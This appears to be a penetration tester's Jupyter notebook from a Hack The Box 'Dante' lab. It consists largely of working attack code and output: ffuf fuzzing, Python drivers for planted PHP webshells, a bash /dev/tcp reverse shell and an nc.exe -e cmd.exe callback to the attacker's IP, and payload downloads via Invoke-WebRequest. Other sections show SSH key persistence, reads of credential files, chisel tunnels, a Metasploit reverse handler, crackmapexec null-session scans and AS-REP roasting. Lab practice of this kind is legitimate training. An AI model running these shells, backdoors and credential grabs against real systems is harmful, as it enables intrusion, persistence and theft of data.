          \/_/    \/_/   \/___/    \/_/       

       v1.3.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.110.100:65000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

.htaccess               [Status: 403, Size: 281, Words: 20, Lines: 10]0] :: Errors: 0 ::
.htpasswd               [Status: 403, Size: 281, Words: 20, Lines: 10]0] :: Errors: 0 ::
robots.txt              [Status: 200, Size: 110

In [8]:
wordlist="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
# ffuf is not installed by default on kali (apt install ffuf)
#outputLocationGoBuster = boxDir + "/ffufMedList.txt"
destIP = "10.10.16.12"
destPort = 32000
url="http://" + destIP + ":" + str(destPort) + "/FUZZ"
#url="http://" + destIP + "" + "/FUZZ"
#url="https://" + destIP + ":9201" + "/FUZZ"
#url="https://" + destDNS + "/FUZZ"
print(url)
#wordlist="/usr/share/wordlists/dirb/big.txt"
!ffuf -u $url -w $wordlist

http://10.10.16.12:32000/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.16.12:32000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

default                 [Status: 403, Size: 807, Words: 335, Lines: 14]0] :: Errors: 0 ::
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 403, Size: 793, Words: 335, Lines: 14]

html                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
21                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
files                   [Status: 403, Size: 803, Words: 335, Lines: 14]00] :: Errors: 0 ::
20                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
features                [Status: 403, Size: 809, Words: 335, Lines: 14]00] :: Errors: 0 ::
6                       [Status: 403, Size: 795, Words: 335, Lines: 14]00] :: Errors: 0 ::
22                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
page                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
5                       [Status: 403, Size: 795, Words: 335, Lines: 14]00] :: Errors: 0 ::
misc                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
partners                [Status: 403, Size: 809, Words: 335, Lines: 14]00] :: Errors: 0 ::

library                 [Status: 403, Size: 807, Words: 335, Lines: 14]00] :: Errors: 0 ::
wiki                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
header                  [Status: 403, Size: 805, Words: 335, Lines: 14]00] :: Errors: 0 ::
b                       [Status: 403, Size: 795, Words: 335, Lines: 14]00] :: Errors: 0 ::
internet                [Status: 403, Size: 809, Words: 335, Lines: 14]00] :: Errors: 0 ::
in                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
education               [Status: 403, Size: 811, Words: 335, Lines: 14]
advertise               [Status: 403, Size: 811, Words: 335, Lines: 14]00] :: Errors: 0 ::
spam                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
go                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
users                   [Status: 403, Size: 803, Words: 335, Lines: 14]00] :: Errors: 0 ::
a                 

EuropeMirror            [Status: 403, Size: 817, Words: 335, Lines: 14]00] :: Errors: 0 ::
Home                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
detail                  [Status: 403, Size: 805, Words: 335, Lines: 14]00] :: Errors: 0 ::
32                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
entertainment           [Status: 403, Size: 819, Words: 335, Lines: 14]00] :: Errors: 0 ::
categories              [Status: 403, Size: 813, Words: 335, Lines: 14]
newsletters             [Status: 403, Size: 815, Words: 335, Lines: 14]00] :: Errors: 0 ::
assets                  [Status: 302, Size: 0, Words: 1, Lines: 1]0:00:00] :: Errors: 0 ::
pr                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
36                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
strona_14               [Status: 403, Size: 811, Words: 335, Lines: 14]00] :: Errors: 0 ::
strona_6          

microsoft               [Status: 403, Size: 811, Words: 335, Lines: 14]00] :: Errors: 0 ::
m                       [Status: 403, Size: 795, Words: 335, Lines: 14]00] :: Errors: 0 ::
f                       [Status: 403, Size: 795, Words: 335, Lines: 14]
java                    [Status: 403, Size: 801, Words: 335, Lines: 14]
issues                  [Status: 403, Size: 805, Words: 335, Lines: 14]00] :: Errors: 0 ::
show                    [Status: 403, Size: 801, Words: 335, Lines: 14]00] :: Errors: 0 ::
memberlist              [Status: 403, Size: 813, Words: 335, Lines: 14]00] :: Errors: 0 ::
es                      [Status: 403, Size: 797, Words: 335, Lines: 14]00] :: Errors: 0 ::
e                       [Status: 403, Size: 795, Words: 335, Lines: 14]
art                     [Status: 403, Size: 799, Words: 335, Lines: 14]00] :: Errors: 0 ::
guide                   [Status: 403, Size: 803, Words: 335, Lines: 14]00] :: Errors: 0 ::
pubs                    [Status: 403, Size: 801, Words: 

...

whenu                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
livescience             [Status: 403, Size: 815, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
reiserfs                [Status: 403, Size: 809, Words: 335, Lines: 14]
lombardia               [Status: 403, Size: 811, Words: 335, Lines: 14]
greenbar                [Status: 403, Size: 809, Words: 335, Lines: 14]
supportoptions          [Status: 403, Size: 821, Words: 335, Lines: 14]
testata                 [Status: 403, Size: 807, Words: 335, Lines: 14]
e911                    [Status: 403, Size: 801, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
bigmac                  [Status: 403, Size: 805, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
36013                   [Status: 403, Size: 803, Words: 335, Lines: 14]
11918                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
11929                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 :

gn_dl                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
foot-left               [Status: 403, Size: 811, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
tabs2                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
bsdi                    [Status: 403, Size: 801, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
gn_comm                 [Status: 403, Size: 807, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
iogear                  [Status: 403, Size: 805, Words: 335, Lines: 14]
gn_store                [Status: 403, Size: 809, Words: 335, Lines: 14]
joyoftech               [Status: 403, Size: 811, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
co2                     [Status: 403, Size: 799, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
sld010                  [Status: 403, Size: 805, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
tips_tricks             [Status: 403, Size: 815, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
d

bananas                 [Status: 403, Size: 807, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
auxnav_top              [Status: 403, Size: 813, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
11stategov              [Status: 403, Size: 813, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
06constitutional        [Status: 403, Size: 825, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
23intellectprop         [Status: 403, Size: 823, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
12international         [Status: 403, Size: 823, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
mp3_music               [Status: 403, Size: 811, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
27labor                 [Status: 403, Size: 807, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
pentesting              [Status: 403, Size: 813, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
09criminal              [Status: 403, Size: 813, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
googlegroups            [Status: 403, Size: 817, W

10845                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
03-week                 [Status: 403, Size: 807, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
9992                    [Status: 403, Size: 801, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
35210                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
milw0rm-wi              [Status: 403, Size: 813, Words: 335, Lines: 14]
11369                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
malware_trends          [Status: 403, Size: 821, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
b_links                 [Status: 403, Size: 807, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
livesupport             [Status: 403, Size: 815, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
31872                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
17885                   [Status: 403, Size: 803, Words: 335, Lines: 14]:0

Semantic_Web            [Status: 403, Size: 817, Words: 335, Lines: 14]:01:16] :: Errors: 0 ::
michel                  [Status: 403, Size: 805, Words: 335, Lines: 14]:01:17] :: Errors: 0 ::
amethyst                [Status: 403, Size: 809, Words: 335, Lines: 14]:01:17] :: Errors: 0 ::
11308                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:17] :: Errors: 0 ::
user_authentication     [Status: 403, Size: 831, Words: 335, Lines: 14]
internet_tracking       [Status: 403, Size: 827, Words: 335, Lines: 14]
no_fear                 [Status: 403, Size: 807, Words: 335, Lines: 14]
tour4                   [Status: 403, Size: 803, Words: 335, Lines: 14]
28420                   [Status: 403, Size: 803, Words: 335, Lines: 14]
nci                     [Status: 403, Size: 799, Words: 335, Lines: 14]
mariposaHD              [Status: 403, Size: 813, Words: 335, Lines: 14]:01:17] :: Errors: 0 ::
01426                   [Status: 403, Size: 803, Words: 335, Lines: 14]:01:17] :: Errors: 0 :

<a id="webshell_10.10.110.100"></a>
## php webshell 10.10.110.100

[Back to Index](#index)

In [2]:
## Interact with PHP Backdoor
import requests
import base64
remoteIP = "10.10.110.100:65000"
remoteDNS = "registry.htb"

remoteurl = "http://" + remoteIP + "/wordpress/wp-content/"

# Change as necessary
remoteBackdoor = "plug.php"
remoteLocation = remoteurl + remoteBackdoor
print(remoteLocation)

#commandList = ['cat /etc/passwd']
#commandList = ["ls -lhaR /home"]
#commandList += ["uname -a"]
#commandList = ["cat /home/maria/user.txt"]
#commandList = ['uname -a', 'ps -aef --forest', 'netstat -anop', 'cat /etc/crontab', 'ls -lhaR /var/www/html', 'ls -lhaR /home']
#commandList = ['cat /var/www/html/support/uploads/tickets/nc.sh']
#commandList += ['ls -lha /var/www/html/support/uploads/tickets/']
#commandList = ['crontab -l']
#commandList = ['whoami']
#commandList += ['cat /home/help/user.txt']
#commandList = ['mkdir /home/help/.ssh']
#commandList = ['chmod 700 /home/help/.ssh']
#commandList += ['echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEbjJVcUNwV1ZuSGVzUUk4WFVwZ29BRTJQVTVMVjFFbjFtWkR4ZFJQMVFQcTRHMGxLait3NFJsRFZmZ1gvQ2tEbm4yaDY2V2kwR0RkaWkvK3FmVjU1Z2hjQUhNZ3JSQkRJSU1zMTR5ZVlMUjZSWHJwb0xaT0d5RnBUbnhHT3BtRFJRb2NPTEF3WllOZmxHa1Y5Ti9EWE1maERFTzMzNjlHdEF1UW8zSi9QM0dxRVJoeWtHMHV6OU91elFUY0FsR2wwa2V3RFJlZHJyMnJtdzB6RW9CT3pyYVFYYy92VnZuL0lTL2ZTM2RKZFpkZk9pM2FCemN1NFh2NkM2ZzNjVVdNZEgrVFpwS3RvVGp4dnUrTW1VRDltS0tmOTFUNlR3V1ZNdXJKNmozZ2NNWGR3emlLVVFnZWpOU0lZZGxrc0FKbldKaWtKditjVytnZjBmZWNTV0FzOUNMdUlzZnJlNUpLa0huV0tNU2pGTDRTSUNsVDI2M1A5ckRnQ1hwUXQ3dzQvR3U5ZlVVbG1YYWFQbGxSVExUdEM5WVBMbkd3cjkzdjZHd0pVY0RhYmZyek13TG5VcDRIb0liZVNZcWJHcTc5R2ZRVHNDVGhIaGNYRXhLVnZuN1IxaUdqWlJJbm95bWZOLzBhQWtPSGtWelE5c1crZDNTUHFJRDhvUzJlYVYyL2s9IGthbGlAa2FsaQo= | base64 -d > /home/help/.ssh/authorized_keys']
#commandList += ['chmod 400 /home/help/.ssh/authorized_keys']
#commandList += ['ls -lha /home/help/.ssh']
#commandList = ['bash -c /var/www/html/support/uploads/tickets/nc.sh']
#commandList = ['/var/www/html/support/uploads/tickets/nc.bin 10.10.14.4 8093']
commandList = ["bash -c \"/bin/bash -i >& /dev/tcp/10.10.16.12/6080 0>&1\""]

for c in commandList:
    postObj = {'cmd': c}
    results = requests.post(remoteLocation, data = postObj)
    print(results.text)

print("Completed the command(s) issued!")

http://10.10.110.100:65000/wordpress/wp-content/plug.php
<pre></pre>
Completed the command(s) issued!


<a id="webshell_172_16_1_102"></a>
## php webshell 172.16.1.102

[Back to Index](#index)

In [18]:
### Interacting with the SSH SOCKS proxy going to 172.16.1.102
## Interact with PHP Backdoor
import requests
import base64
# http://127.0.0.1:33000/user/images/25a452927110e39a345a2511c57647f21625857841.php?cmd=dir
#http://127.0.0.1:33000/user/images/25a452927110e39a345a2511c57647f21625955860.php?cmd=dir
remoteIP = "127.0.0.1:33000"
remoteDNS = "dante.htb"

remoteurl = "http://" + remoteIP + "/user/images/"

# Change as necessary
remoteBackdoor = "25a452927110e39a345a2511c57647f21629848350.php"
remoteLocation = remoteurl + remoteBackdoor
print(remoteLocation)

# Windows Command List
#commandList = ["systeminfo"]
#commandList = ['whoami', 'net user', 'net localgroup administrators', 'ipconfig']
#commandList = ['dir c:\\users\\blake', 'dir c:\\users\\Public']
#commandList = ['dir c:\\users\\blake\\.docker', 'dir c:\\users\\blake\\Desktop', 'dir c:\\users\\blake\\Documents', 'dir c:\\users\\blake\\Downloads']
#commandList = ['more c:\\users\\blake\\.docker\\daemon.json', 'more c:\\users\\blake\\Desktop\\flag.txt']
#commandList = ['cmd.exe /c powershell.exe -c "Get-Service -Name Apache2.4"']
#commandList = ['sc qc Apache2.4']
#commandList = ['sc query windefend']
# Access is denied... to stop the windows defender service...
#commandList = ['sc stop windefend']
#commandList = ['cmd.exe /c powershell.exe -c "Get-Process -Name accesschk64"']
#commandList = ['cmd.exe /c powershell.exe -c "Get-Process"']
#commandList = ['netstat -ano']
#commandList = ['tcpvcon -a 6224']
#commandList = ['netsh firewall show state']
#commandList = ['netsh firewall show config']
#commandList = ['schtasks /query /fo LIST /v', 'dir C:\\Users\\Administrator\\Music\\']
# Access denied... dir C:\\Users\\Administrator\\Music\\
#commandList = ['dir c:\\Projects', 'dir c:\\xampp']
# Can write to c:\\projects
#commandList = ['echo "T" > c:\\projects\\t.txt', 'dir c:\\Projects\\']
#commandList = ['del c:\\projects\\t.txt', 'dir c:\\Projects\\']
#commandList = ['more c:\\xampp\\passwords.txt']
#commandList = ['more "c:\\xampp\\FileZillaFTP\\FileZilla Server.xml"']
#commandList = ['dir c:\\windows\\panther', 'more c:\\windows\\panther\\setupact.log']
#commandList = ['net user']
#commandList = ['whoami']
#commandList = ['net localgroup docker-users']
# Check if windows defender is running
#commandList = ['cmd.exe /c powershell.exe -c "Get-MpComputerStatus"']
#commandList = ['cmd.exe /c powershell.exe "c:\\users\\blake\\desktop\\coolNetstat_script.ps1" > c:\\users\\blake\\desktop\\output.txt', 'dir c:\\users\\blake\\desktop\\']
# Gathers Services that are running without system32 in the path...
#commandList = ['cmd.exe /c powershell.exe -c "Get-CimInstance win32_service | Where-Object { ($_.State -eq """Running""") -and ($_.PathName -notlike """*System32*""") } | Format-List -Property *"']
#commandList = ['dir c:\\apps']
# This does reach through the firewall and download the file hosted on a python3 server
#commandList = ['cmd.exe /c powershell.exe -c "Invoke-WebRequest -Uri http://10.10.16.114:8090/coolNetstat_script.ps1 -outfile c:\\users\\blake\\desktop\\coolNetstat_script.ps1"', 'dir c:\\users\\blake\\desktop']
#commandList = ['cmd.exe /c powershell.exe -c "Invoke-WebRequest -Uri http://10.10.16.114:8090/nc.exe -outfile c:\\users\\blake\\desktop\\nc.exe"', 'dir c:\\users\\blake\\desktop']
#commandList = ['del c:\\xampp\\htdocs\\user\\images\\query.php','cmd.exe /c powershell.exe -c "Invoke-WebRequest -Uri http://10.10.16.114:8090/query.php -outfile c:\\xampp\\htdocs\\user\\images\\query.php"']
# START /B to background the process from the command line
#commandList = ['START /B c:\\users\\blake\\desktop\\accesschk64.exe -ucqv * > c:\\users\\blake\\desktop\\ac_output.txt']
#commandList = ['START /B c:\\users\\blake\\desktop\\winPEAS.bat > c:\\users\\blake\\desktop\\winPEAS_output.txt']
#commandList = ['dir "c:\\projects\\websites\\Online Marriage Registration System\\Site backup\\"']
# DB Connection user=root password=<blank>
#commandList = ['more c:\\users\\blake\\desktop\\output.txt']
#commandList = ['more c:\\xampp\\phpmyadmin\\config.inc.php']
#commandList = ['more c:\\xampp\\htdocs\\user\\change-password.php']
#commandList = ['more c:\\xampp\\htdocs\\admin\\forgot-password.php']
#commandList = ['more c:\\xampp\\htdocs\\user\\includes\\dbconnection.php']
#commandList = ['mysqldump -u root -p --all-databases']
#commandList = ['copy c:\\users\\blake\\desktop\\winPEAS_output.txt c:\\xampp\\htdocs\\user\\images\\winPEAS_output.txt']
#commandList = ['dir c:\\users\\blake\\desktop\\']
commandList = ['cmd.exe /c "c:\\users\\blake\\desktop\\nc.exe 10.10.16.114 8090 -e cmd.exe"']
#commandList = ['net view /domain']
#commandList = ['del c:\\xampp\\htdocs\\user\\images\\winPEAS_output.txt']
#commandList = ['schtasks change /TN Cleaner /TR "powershell.exe c:\\users\\blake\\clean.ps1"']
#commandList = ['cmd.exe /c powershell.exe -c "Get-ScheduledTask -TaskName Cleaner | Format-List"']
#commandList = ['copy c:\\projects\\server.exe c:\\xampp\\htdocs\\user\\images\\server.exe']
#commandList = ['dir "c:\\program files\\"']
# Did not work for the coolNetstat_script.ps1
#commandList = ['cmd.exe /c powershell.exe -encodedCommand "JG5ldHMgPSBuZXRzdGF0IC1hbm8gfCBzZWxlY3Qtc3RyaW5nIExJU1RFTklORwpmb3JlYWNoKCRuIGluICRuZXRzKXsKICAgICMgbWFrZSBzcGxpdCBlYXNpZXIgUExVUyBtYWtlIGl0IGEgc3RyaW5nIGluc3RlYWQgb2YgYSBtYXRjaCBvYmplY3Q6CiAgICAkcCA9ICRuIC1yZXBsYWNlICcgKycsJyAnCiAgICAjIG1ha2UgaXQgYW4gYXJyYXk6CiAgICAkbmFyID0gJHAuU3BsaXQoJyAnKQogICAgIyBwaWNrIGxhc3QgaXRlbToKICAgICRwbmFtZSA9ICQoR2V0LVByb2Nlc3MgLWlkICRuYXJbLTFdKS5Qcm9jZXNzTmFtZQogICAgJHBwYXRoID0gJChHZXQtUHJvY2VzcyAtaWQgJG5hclstMV0pLlBhdGgKICAgICRwcm9jZXNzSWQgPSAkKEdldC1Qcm9jZXNzIC1pZCAkbmFyWy0xXSkuSWQKICAgICMgcHJpbnQgdGhlIG1vZGlmaWVkIGxpbmUgd2l0aCBwcm9jZXNzbmFtZSBpbnN0ZWFkIG9mIFBJRDoKICAgICRuIC1yZXBsYWNlICIkKCRuYXJbLTFdKSIsIiQoJHBwYXRoKSAkKCRwbmFtZSkgJCgkcHJvY2Vzc0lkKSIKfQo=" | Out-File c:\\users\\blake\\desktop\\n_output.txt', 'dir c:\\users\\blake\\desktop\\']
#commandList = ['tasklist /V']  # Allows you to identify who is running a given process...  server.exe is run as the administrator account

# Kill a process by PID
#commandList = ['taskkill /F /PID 6072']

for c in commandList:
    postObj = {'cmd': c}
    results = requests.post(remoteLocation, data = postObj)
    print(results.text)

print("Completed the command(s) issued!")

http://127.0.0.1:33000/user/images/25a452927110e39a345a2511c57647f21629848350.php
<br />
<b>Fatal error</b>:  Maximum execution time of 120 seconds exceeded in <b>C:\xampp\htdocs\user\images\25a452927110e39a345a2511c57647f21629848350.php</b> on line <b>1</b><br />

Completed the command(s) issued!


<a id="chisel"></a>
## chisel Tunnel

[Back to Index](#index)

````
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

 # Execute on Kali (172.16.53.133)
./chisel server -p 8000 --reverse

# Execute on Windows box (172.16.53.129)
./chisel client 172.16.53.133:8000 R:4444:127.0.0.1:4444

Then connect to the service running as localhost on 172.16.53.129 through the tunnel created on 172.16.53.133 over port 4444.  (nc 127.0.0.1 4444)
````

<a id="metahandler"></a>
## Metasploit Multi-Handler

[Back to Index](#index)

In [12]:
port=8090
outputLocationmhandler = boxDir + "/mhandler.rc"
f = open(outputLocationmhandler, 'w')
f.write("use exploit/multi/handler\n")
# Binding payload
#f.write("set payload windows/x64/meterpreter/bind_tcp")
#f.write("set RHOSTS " + destIP + "\n")
#f.write("set RPORT " + str(port))
f.write("set payload cmd/unix/reverse_perl\n")
f.write("set LHOST " + vpnIP + "\n")
f.write("set LPORT " + str(port) + "\n")
f.write("run -j")
f.close()

!cat $outputLocationmhandler
print("\n")
print("Execute to Start: msfconsole -r " + outputLocationmhandler)

use exploit/multi/handler
set payload cmd/unix/reverse_perl
set LHOST 10.10.16.114
set LPORT 8090
run -j

Execute to Start: msfconsole -r /home/kali/hackthebox/dante/output/172_16_1_17/mhandler.rc


<a id="nmapinternal"></a>
## nmap - Internal Subnet
Scan subnet for information of the hosts present

[Back to Index](#index)

In [16]:
!proxychains nmap -Pn --min-rate=1000 -p- -T4 172.16.1.101

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-27 18:42 EST


#### Subnet Information

````
Nmap scan report for 172.16.1.12
Host is up (0.056s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql
````

<a id="crackmapexec"></a>
## crackmapexec 
Initial Enumeration

[Back to Index](#index)

In [4]:
# Scan with crackmapexec using LDAP
!proxychains crackmapexec ldap 172.16.1.0/24

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
LDAP        172.16.1.5      389    DANTE-SQL01      [*] Windows Server 2016 Standard 14393 x64 (name:DANTE-SQL01) (domain:DANTE-SQL01) (signing:False) (SMBv1:True)
LDAP        172.16.1.20     389    DANTE-DC01       [*] Windows Server 2012 R2 Standard 9600 x64 (name:DANTE-DC01) (domain:DANTE.local) (signing:True) (SMBv1:True)
LDAP        172.16.1.10     389    DANTE-NIX02      [*] Windows 6.1 Build 0 (name:DANTE-NIX02) (domain: ) (signing:False) (SMBv1:False)
LDAP        172.16.1.17     389    DANTE-NIX03      [*] Windows 6.1 Build 0 (name:DANTE-NIX03) (domain: ) (signing:False) (SMBv1:False)
LDAP        172.16.1.102    389    DANTE-WS03       [*] Windows 10.0 Build 18362 x64 (name:DANTE-WS03) (domain:DANTE-WS03) (signing:False) (SMBv1:False)
LDAP        172.16.1.101    389    DANTE-WS02       [*] Windows 10.0 Build 18362 x64 (name:DANTE-WS02) (domain:DANTE-WS0

In [5]:
# Try NULL sessions with crackmapexec
!proxychains crackmapexec smb 172.16.1.0/24 -u '' -p ''

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
SMB         172.16.1.20     445    DANTE-DC01       [*] Windows Server 2012 R2 Standard 9600 x64 (name:DANTE-DC01) (domain:DANTE.local) (signing:True) (SMBv1:True)
SMB         172.16.1.5      445    DANTE-SQL01      [*] Windows Server 2016 Standard 14393 x64 (name:DANTE-SQL01) (domain:DANTE-SQL01) (signing:False) (SMBv1:True)
SMB         172.16.1.17     445    DANTE-NIX03      [*] Windows 6.1 Build 0 (name:DANTE-NIX03) (domain: ) (signing:False) (SMBv1:False)
SMB         172.16.1.10     445    DANTE-NIX02      [*] Windows 6.1 Build 0 (name:DANTE-NIX02) (domain: ) (signing:False) (SMBv1:False)
SMB         172.16.1.102    445    DANTE-WS03       [*] Windows 10.0 Build 18362 x64 (name:DANTE-WS03) (domain:DANTE-WS03) (signing:False) (SMBv1:False)
SMB         172.16.1.101    445    DANTE-WS02       [*] Windows 10.0 Build 18362 x64 (name:DANTE-WS02) (domain:DANTE-WS0

In [6]:
# List shares on 172.16.1.17 with null session
!proxychains crackmapexec smb 172.16.1.17 -u '' -p '' --shares

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
SMB         172.16.1.17     445    DANTE-NIX03      [*] Windows 6.1 Build 0 (name:DANTE-NIX03) (domain: ) (signing:False) (SMBv1:False)
SMB         172.16.1.17     445    DANTE-NIX03      [+]  \: 
SMB         172.16.1.17     445    DANTE-NIX03      [+] Enumerated shares
SMB         172.16.1.17     445    DANTE-NIX03      Share           Permissions     Remark
SMB         172.16.1.17     445    DANTE-NIX03      -----           -----------     ------
SMB         172.16.1.17     445    DANTE-NIX03      forensics       READ,WRITE      
SMB         172.16.1.17     445    DANTE-NIX03      IPC$                            IPC Service (DANTE-NIX03 server (Samba, Ubuntu))


<a id="impacketgetnpusers"></a>
## Impacket - GetNPUsers

[Back to Index](#index)

In [15]:
# Enumerating User Accounts
locationGetNPUsers="/home/kali/hackthebox/dante/impacket/examples/GetNPUsers.py"
# Generated users.txt file in /home/kali/hackthebox/dante/users.txt
#usersTXT = "/home/kali/hackthebox/dante/users.txt"
usersTXT = "/home/kali/hackthebox/dante/namelist.txt"
domain = "DANTE.local/"
!proxychains python3 $locationGetNPUsers $domain -dc-ip $destIP -usersfile $usersTXT -format john


[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ER

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
